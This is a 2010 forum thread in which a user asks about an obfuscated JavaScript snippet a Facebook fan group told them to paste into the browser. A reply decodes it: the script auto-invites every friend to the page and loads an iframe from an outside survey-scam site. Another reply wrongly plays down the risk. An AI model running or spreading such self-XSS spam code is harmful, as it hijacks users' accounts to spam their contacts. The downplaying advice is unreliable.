Log in

View Full Version : Is this JavaScript code going to shoot me in the face?



Snookerman
04-13-2010, 03:10 PM
I joined one of those annoying groups on Facebook that promises to reveal some incredibolous information if you become a fan and paste the following code in your browser:

javascript:var _0x986f=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F \x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E \x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x30\x32\x34\x38\x38\x37\x39\x30\x30\x38\x38\x39\x33\x22\x20\x63\x6C\x61 \x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64 \x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2D\x77\x61\x76\x65\x2D\x69\x6E\x76\x69 \x74\x65\x73\x2E\x69\x6E\x66\x6F\x2F\x73\x61\x6E\x6E\x69\x6E\x67\x65\x6E\x2F\x69\x6E\x64\x65\x78\x2E\x68\x74\x6D\x6C\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69 \x64\x74\x68\x3A\x20\x37\x36\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x35\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D \x30\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];var variables=[_0x986f[0],_0x986f[1],_0x986f[2],_0x986f[3],_0x986f[4],_0x986f[5],_0x986f[6],_0x986f[7],_0x986f[8],_0x986f[9],_0x986f[10],_0x986f[11],_0x986f[12],_0x986f[13]]; void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]](c); void setTimeout(function (){fs[variables[10]]();} ,4000); void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void (document[variables[2]](variables[1])[variables[0]]=_0x986f[14]);


I just started learning JavaScript a few weeks ago, so I get nada. I'm guessing it'll direct me to some weird page. Can anyone help? Thanks!

bluewalrus
04-13-2010, 03:21 PM
The jargoon is hex


innerHTMLapp4949752878_body<a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.phpclass=FanManager&amp;node_id=110248879008893" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>clickinitEventdispatchEventselect_allsgm_invite_form/ajax/social_graph/invite_dialog.phpsubmitDialog<iframe src="http://www.google-wave-invites.info/sanningen/index.html" style="width: 760px; height: 650px;" frameborder=0 scrolling="no"></iframe>

djr33
04-13-2010, 05:17 PM
Looks like regular facebook stuff to me-- share with friends, etc. If you want that, go for it. Javascript rarely does anything 'bad', in the sense that you can always remove it later. XSS (cross-site scripting) is the only big thing to worry about, because it can steal info from cookies (for example) and send it to another server, but that's rarely a problem because it must coincide with personal information being on the page-- bad if it's on your site, but if you're just testing code it shouldn't hurt much. Then again, I'm not an expert with JS either, but it's not something you need to worry about as you would with PHP, etc.

Snookerman
04-13-2010, 06:32 PM
It looks like it was a link to some surveys that you have to go through, but after some firebugging this was the promised info:
http://www.switched.com/2008/09/18/does-text-messaging-cause-brain-damage/ (http://www.switched.com/2008/09/18/does-text-messaging-cause-brain-damage/)
yeah... *Remove Me From Fans*

Thanks!